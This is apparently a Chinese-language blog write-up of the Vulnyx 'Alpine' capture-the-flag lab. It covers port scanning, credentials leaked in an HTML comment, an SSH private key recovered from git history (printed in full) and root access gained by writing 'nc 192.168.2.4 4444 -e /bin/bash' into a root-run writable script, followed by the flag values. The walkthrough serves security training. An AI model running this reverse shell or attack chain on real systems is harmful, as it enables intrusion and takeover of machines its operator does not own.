Alpine

靶机说明

https://vulnyx.com/

一、信息收集

1、主机探测

┌──(root㉿kali)-[/miaosec]
└─# nmap -sn 192.168.2.0/24              
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-06 09:30 CST
Nmap scan report for 192.168.2.1
Host is up (0.00053s latency).
MAC Address: 0A:00:27:00:00:07 (Unknown)
Nmap scan report for 192.168.2.2
Host is up (0.00029s latency).
MAC Address: 08:00:27:CC:CD:C8 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.33
Host is up (0.00084s latency).
MAC Address: 08:00:27:89:FE:07 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.2.4
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.09 seconds

靶机IP：192.168.2.33

2、端口扫描

1.全端口扫描

┌──(root㉿kali)-[/miaosec]
└─# nmap --min-rate 10000 -p- 192.168.2.33                        
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-06 09:31 CST
Nmap scan report for 192.168.2.33
Host is up (0.00061s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:89:FE:07 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 3.94 seconds

开放端口：22、80

2.详细信息扫描

┌──(root㉿kali)-[/miaosec]
└─# nmap --min-rate 10000 -sT -sV -sC -O -p22,80 192.168.2.33 
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-06 09:31 CST
Nmap scan report for 192.168.2.33
Host is up (0.00082s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 10.2 (protocol 2.0)
80/tcp open  http    Apache httpd 2.4.66
|_http-title: Did not follow redirect to http://alpine.nyx/
|_http-server-header: Apache/2.4.66 (Unix)
MAC Address: 08:00:27:89:FE:07 (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: Host: default

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.58 seconds

找到一个域名：alpine.nyx

3.udp扫描

┌──(root㉿kali)-[/miaosec]
└─# nmap -sU --top-ports 100 192.168.2.33                    
Starting Nmap 7.94SVN ( https://nmap.org ) at 2026-01-06 09:32 CST
Nmap scan report for 192.168.2.33
Host is up (0.0030s latency).
All 100 scanned ports on 192.168.2.33 are in ignored states.
Not shown: 100 closed udp ports (port-unreach)
MAC Address: 08:00:27:89:FE:07 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 98.12 seconds

二、WEB渗透

1、目录扫描

扫描alpine.nyx

┌──(root㉿kali)-[/miaosec]
└─# gobuster dir -u http://alpine.nyx -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -x php,txt,html,bak,md,db,js
...
/index.html           (Status: 200) [Size: 12461]
/.html                (Status: 403) [Size: 313]
/login.html           (Status: 200) [Size: 3182]
/profile.html         (Status: 200) [Size: 9571]
/booking.html         (Status: 200) [Size: 3217]
/.html                (Status: 403) [Size: 313]
/server-status        (Status: 403) [Size: 313]
...

2、信息泄露

访问/login.html，查看页面源码发现账号和密码

1 2	`<!-- TODO: Remove test credentials before going live --> <!-- portal test user: testuser / WinterIsComing! -->`

进行登录，找到ssh的账号和密码：developer:SummerVibes2024!

三、获取developer权限

使用获取到的凭证进行登录

┌──(root㉿kali)-[~]
└─# ssh developer@192.168.2.33                                  
developer@alpine:~$ id
uid=1000(developer) gid=1000(developer) groups=1000(developer)

四、权限提升

1、获取sysadmin权限

查看/home/developer/README.txt，提示我们使用git进行部署的

查看/home/sysadmin/发现存在.git泄露

1-Git泄露

查看git的日志

developer@alpine:~$ git log 
commit 0c6ee270764eb91ee53afc9784881371d4dddd93 (HEAD -> master)

diff --git a/.ssh-backup/id_rsa b/.ssh-backup/id_rsa
commit 0c6ee270764eb91ee53afc9784881371d4dddd93 (HEAD -> master)
Author: sysadmin <sysadmin@snowpeak.nyx>
Date:   Thu Dec 11 11:14:27 2025 +0000

    Remove backup

commit 02f9a1879dbfa40703a6bcbd985e5a19542c24c8
Author: sysadmin <sysadmin@snowpeak.nyx>
Date:   Thu Dec 11 11:13:53 2025 +0000

    Backup SSH keys before server migration

commit 2823ba92f4fdee9b5d71e74f9f060a5d5ed3b593
Author: sysadmin <sysadmin@snowpeak.nyx>
Date:   Thu Dec 11 11:13:26 2025 +0000

    Initial commit: Add database config

找到三个镜像：0c6ee270764eb91ee53afc9784881371d4dddd93、02f9a1879dbfa40703a6bcbd985e5a19542c24c8和2823ba92f4fdee9b5d71e74f9f060a5d5ed3b593

查看镜像内容

developer@alpine:~$ git show 02f9a1879dbfa40703a6bcbd985e5a19542c24c8
diff --git a/.ssh-backup/id_rsa b/.ssh-backup/id_rsa
new file mode 100644
index 0000000..76b357a
--- /dev/null
+++ b/.ssh-backup/id_rsa
@@ -0,0 +1,27 @@
+-----BEGIN OPENSSH PRIVATE KEY-----
+b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
+NhAAAAAwEAAQAAAQEA3ZnZAOyE5gZN5QxDnRnYnRfXHwCavg4mJz2HbUWI7p3lGi+tdL6u
+IbqPyjqbH69DcyQCubvORi4domdpqTchLF7PyJlUBHVIo3AULC1kVhMqGvctWQxAgPRvr7
+zM7HGr+NpTPEkM/4BjfJToy706FGjfiXBhjkSiv5cHOlnXxhO44NkKSxvySnXkmYq3PNNF
+5OtjZJg+7+XrZKoUsaipupjOcZgsQCx1Yf1xE4gWIi/jS9kY07R0GtNdqaW2Z9UwXYGMFW
+xGKPtczHbRgcxtdP9ne71C/Zh5zsTPtgWWx8cO+P0N0emTYNDEMlD+4IH9AygBbnAzY978
+qc2jiRSxJwAAA8jbDUur2w1LqwAAAAdzc2gtcnNhAAABAQDdmdkA7ITmBk3lDEOdGdidF9
+cfAJq+DiYnPYdtRYjuneUaL610vq4huo/KOpsfr0NzJAK5u85GLh2iZ2mpNyEsXs/ImVQE
+dUijcBQsLWRWEyoa9y1ZDECA9G+vvMzscav42lM8SQz/gGN8lOjLvToUaN+JcGGORKK/lw
+c6WdfGE7jg2QpLG/JKdeSZirc800Xk62NkmD7v5etkqhSxqKm6mM5xmCxALHVh/XETiBYi
+L+NL2RjTtHQa012ppbZn1TBdgYwVbEYo+1zMdtGBzG10/2d7vUL9mHnOxM+2BZbHxw74/Q
+3R6ZNg0MQyUP7ggf0DKAFucDNj3vypzaOJFLEnAAAAAwEAAQAAAQAlkP0uoOnurMbru2aC
+7WzBRNddFBcnfPKO2Glq5szN1sqN4+M91U1jvmK9362Ic4e1rzcfEW1ojEzNyUYqP4RKJ1
+CGKygJEXDc9BUXYCKQTPNoWtq/K8qLkeSVICaFNsf2idxubdvcPIGhDwVf9JYx+41ZmUmQ
+eqY0YIADLlPb6g8z0Cgr0cEQg9PEBUi5FZAhji0hIz9k7BAfAzBaed94y+IPF0gG8AtsRm
+oo9XlqTuiphbkNyTVPzE9mKoqR8pECqSLAcx5+YBFP6tOoKh1BwHqWBG5ixw3fWi2HvgPv
+WeVRTozvXzjP1fVlYi/KyayuOLuiwQrlWvtkXwB4S3cRAAAAgEoibXJoCwzdf1naZQ4yZr
+aHnU5Mkx1XsO3X2bWXdIRZzQuLjAlmbwjQyMRWkiRb12D2uc1LwwQ1lzlBOqnCRXjFpM28
+/M8V6ZwYMP5bJeOGJSKEaikzY7blksM2Pls2P8zuhLiL3DnvQlB/7whKfME2MwH4tBDYTO
+7mS6MbKIElAAAAgQD1zPzaJsyt7gAjYgn/v0Wzj7HfVlLqeLR8TGup5MP8uDq6IJV5pLkf
+S8I4dGTOfrhgTw4VNbwy/BZNZErVnKa+zt6EsHgSqFub5ZVgpwRWx6bkk7lKPikZ62uNye
+gtqE7uJVBu12Li4kWuzyF2/IhcSh1Sp9B7fnF6p5b+t1H84wAAAIEA5svMbW9WTDB5hvgo
+ii5H6OZuIPGNKeEndKVquBeLjKR2QQrK9KQ0d/OgIu4ioEOmQ+NA1tWKr5uXJ4hdBvDCoS
+4tqjiIBNSTx1qkV6tpcbKDaIjTzdCvAJ8wOMymShOVVJkmXvgIsJuydR7OQ+StvR0DRDGp
+rkFejyhcyFIbke0AAAARc3lzYWRtaW5Ac25vd3BlYWsBAg==
+-----END OPENSSH PRIVATE KEY-----

找到存在的ssh私钥

处理一下私钥，得到正确的私钥

查看私钥的用户，得到属于sysadmin用户的私钥

1
2
3

┌──(root㉿kali)-[/tmp]
└─# ssh-keygen -y -f id                                         
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDdmdkA7ITmBk3lDEOdGdidF9cfAJq+DiYnPYdtRYjuneUaL610vq4huo/KOpsfr0NzJAK5u85GLh2iZ2mpNyEsXs/ImVQEdUijcBQsLWRWEyoa9y1ZDECA9G+vvMzscav42lM8SQz/gGN8lOjLvToUaN+JcGGORKK/lwc6WdfGE7jg2QpLG/JKdeSZirc800Xk62NkmD7v5etkqhSxqKm6mM5xmCxALHVh/XETiBYiL+NL2RjTtHQa012ppbZn1TBdgYwVbEYo+1zMdtGBzG10/2d7vUL9mHnOxM+2BZbHxw74/Q3R6ZNg0MQyUP7ggf0DKAFucDNj3vypzaOJFLEn sysadmin@snowpeak

进行登录

┌──(root㉿kali)-[/tmp]
└─# ssh -i id sysadmin@192.168.2.33
sysadmin@alpine:~$ id
uid=1001(sysadmin) gid=1001(sysadmin) groups=1001(sysadmin)

2、获取root权限

在/opt/script下面找到脚本cleanup.sh，查看文件权限，发现该文件使用root权限运行，同时sysadmin用户具有可写权限

1 2	`sysadmin@alpine:/opt/scripts# ls -la cleanup.sh -rwxrwxr-x 1 root sysadmin 287 Jan 6 02:30 cleanup.sh`

那么尝试写入提取命令到cleanup.sh进行提权

1	`sysadmin@alpine:/opt/scripts# echo 'nc 192.168.2.4 4444 -e /bin/bash' > cleanup.sh`

开启监听，等待一段时间，成功获取到root的shell

┌──(root㉿kali)-[~]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.2.4] from (UNKNOWN) [192.168.2.33] 35945
id
uid=0(root) gid=0(root) groups=0(root),0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)

五、查看FLAG

1
2
3

cat /root/root.txt /home/developer/user.txt
6b75b087f12ed42f124d68493469a493
30a0cf321ff0c0997f45a7202490b260

Vulnyx

#信息泄露 #git泄露

Alpine

http://miao-sec.github.io/Vulnyx/Alpine/

作者

Miao

发布于

2026年1月9日

许可协议

BY-MIAO

Ready 上一篇

Explorer 下一篇